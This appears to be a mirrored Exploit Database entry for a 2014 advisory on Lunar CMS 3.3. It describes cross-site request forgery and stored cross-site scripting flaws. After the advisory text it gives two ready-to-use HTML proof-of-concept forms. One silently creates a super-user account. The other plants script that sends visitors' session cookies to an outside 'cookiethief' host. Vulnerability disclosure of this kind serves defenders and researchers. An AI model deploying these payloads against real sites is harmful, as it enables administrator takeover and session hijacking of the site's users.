Lunar CMS 3.3 – Cross-Site Request Forgery / Persistent Cross-Site Scripting

• Exploit Database
• 61 阅读

• 作者： LiquidWorm
  日期： 2014-06-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/33830/

• <!--
  
  Lunar CMS 3.3 CSRF And Stored XSS Vulnerability
  
  
  Vendor: Lunar CMS
  Product web page: http://www.lunarcms.com
  Affected version: 3.3
  
  Summary: Lunar CMS is a freely distributable open sourcecontent
  management system written for use on servers running the ever so
  popular PHP5 & MySQL.
  
  Desc: Lunar CMS suffers from a cross-site request forgery and a
  stored xss vulnerabilities. The application allows users to perform
  certain actions via HTTP requests without performing any validity
  checks to verify the requests. This can be exploited to perform
  certain actions with administrative privileges if a logged-in user
  visits a malicious web site. Input passed to the 'subject' and 'email'
  POST parameters thru the 'Contact Form' extension/module is not properly
  sanitised before being returned to the user. This can be exploited to
  execute arbitrary HTML and script code in a user's browser session in
  context of an affected site.
  
  Tested on: Apache/2.4.7 (Win32)
   PHP/5.5.6
   MySQL 5.6.14
  
  
  Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2014-5188
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5188.php
  
  
  11.06.2014
  
  -->
  
  
  
  CSRF Add Admin
  ===============
  
  <html>
  <body>
  <form action="http://localhost/lunarcms/admin/user_create.php" method="POST">
  <input type="hidden" name="name" value="Hacker" />
  <input type="hidden" name="email" value="lab@zeroscience.mk" />
  <input type="hidden" name="password1" value="251ftw" />
  <input type="hidden" name="password2" value="251ftw" />
  <input type="hidden" name="access" value="0" />
  <input type="hidden" name="Submit" value="submit" />
  <input type="submit" value="Submit form" />
  </form>
  </body>
  </html>
  
  Access levels:
  
  0: Super user
  1: Admin
  2: Website only
  
  
  
  CSRF Stored XSS (Session Hijack)
  =================================
  
  <html>
  <body>
  <form action="http://localhost/lunarcms/admin/extensions.php?ext=contact_form&top" method="POST">
  <input type="hidden" name="email" value='"><script>alert(1);</script>' />
  <input type="hidden" name="error" value="2" />
  <input type="hidden" name="sent" value="1" />
  <input type="hidden" name="subject" value='"><script>var x = new Image();x.src='http://www.example.com/cookiethief.php?cookie='+document.cookie;</script>' />
  <input type="hidden" name="submit" value="submit" />
  <input type="submit" value="Submit form" />
  </form>
  </body>
  </html>